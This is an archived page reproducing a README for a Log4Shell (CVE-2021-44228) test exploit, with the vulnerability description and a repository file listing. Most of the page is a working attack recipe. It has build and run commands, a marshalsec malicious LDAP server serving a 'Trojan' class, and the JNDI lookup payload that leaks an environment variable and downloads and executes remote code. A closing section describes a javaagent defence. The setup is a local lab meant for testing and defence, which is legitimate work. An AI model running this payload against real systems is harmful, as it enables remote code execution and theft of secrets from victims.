Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Source
https://github.com/wajda/log4shell-test-exploit
Associated Vulnerability
Title:Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description:Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
Test exploit of CVE-2021-44228
Readme
# Test exploit of CVE-2021-44228 (log4shell)

### Preparation

```shell
# Install Nodejs HTTP server 
npm -g i http-server

# Build victim app
cd victim-app
mvn install

# Compile Trojan
cd test-trojan
javac Trojan.java

# Build marshalsec (required Java 8)
git clone git@github.com:mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests

# Build log4j-jndi-be-gone
git clone git@github.com:wajda/log4j-jndi-be-gone.git
cd log4j-jndi-be-gone
git checkout shading-support
./gradlew
```

### Start the HTTP server hosting a Trojan payload

```shell
cd test-trojan
http-server .
```

### Start a malicious LDAP server
See https://github.com/mbechler/marshalsec
```shell
cd marshalsec
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8080/#Trojan"
```

### Watch for exploit events (optional)
useful in cases when stderr is hidden
```shell
watch -d -n 1 'ls -la /tmp/ | grep -i log4shell-BUSTED'
```

### Exploit

##### Explanation
The victim application logs the following string via a vulnerable `log4j2` library (version 2.14.1)
```java
log.error("${jndi:ldap://127.0.0.1:1389/a/${env:USER}}");
```
executing two vectors of attacks simultaneously:
1. Sniffing environment variables (`$USER` in this example), that can be viewed in the _marshalsec_ LDAP server output
```
Send LDAP reference result for a/<VICTIM_USER_NAME> redirecting to http://127.0.0.1:8080/Trojan.class
```
2. Download and execute malicious code that logs the message `!!! BUSTED !!!` to the victim's app standard error stream,
as well as creates an empty `/tmp/log4shell-BUSTED-*` file.\
For this attack to work the following JVM option must be enabled on the victim server:
```properties
-Dcom.sun.jndi.ldap.object.trustURLCodebase=true
```

##### Execution

```shell
cd victim-app

# ... in a console app
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar fatjar/target/log4j2-victim-app-1.0-SNAPSHOT.jar

# ... in a web app (on Tomcat)
cp web/target/log4j2-victim-webapp-1.0-SNAPSHOT.war $TOMCAT_HOME/webapps
curl http://localhost:$TOMCAT_HTTP_PORT/log4j2-victim-webapp-1.0-SNAPSHOT/
```

### Defence

See: https://github.com/wajda/log4j-jndi-be-gone/tree/shading-support
```shell
java -javaagent:log4j-jndi-be-gone-1.0.0-wajda-standalone.jar=classSigDetection=enabled -jar fatjar/target/log4j2-victim-app-1.0-SNAPSHOT.jar
```

### System-wide defence
Replace all `java` binaries with the script below:

`java.guarded`
```shell
#!/bin/bash
$(dirname "$0")/java.original "-javaagent:/path/to/log4j-jndi-be-gone-1.0.0-wajda-standalone.jar=logDir=/tmp,classSigDetection=enabled" "$@"
```

Example:

```shell
 cd $(dirname $(which java))
 sudo su
 mv java java.original
 cp java.guarded java
```
File Snapshot

 [4.0K]  /data/pocs/def13006638ff8a1d146847bc201b181a0830d14
├── [1.0K]  LICENSE
├── [2.7K]  README.md
├── [4.0K]  test-trojan
│   ├── [1.7K]  Trojan.class
│   └── [ 940]  Trojan.java
└── [4.0K]  victim-app
    ├── [4.0K]  core
    │   ├── [1.0K]  pom.xml
    │   └── [4.0K]  src
    │       └── [4.0K]  main
    │           └── [4.0K]  java
    │               └── [4.0K]  my
    │                   └── [4.0K]  app
    │                       ├── [ 362]  Main.java
    │                       └── [ 976]  MainWrapper.java
    ├── [4.0K]  fatjar
    │   └── [2.9K]  pom.xml
    ├── [ 675]  pom.xml
    └── [4.0K]  web
        ├── [1.1K]  pom.xml
        └── [4.0K]  src
            └── [4.0K]  main
                └── [4.0K]  webapp
                    ├── [ 193]  index.jsp
                    └── [4.0K]  WEB-INF
                        └── [ 307]  web.xml

14 directories, 12 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →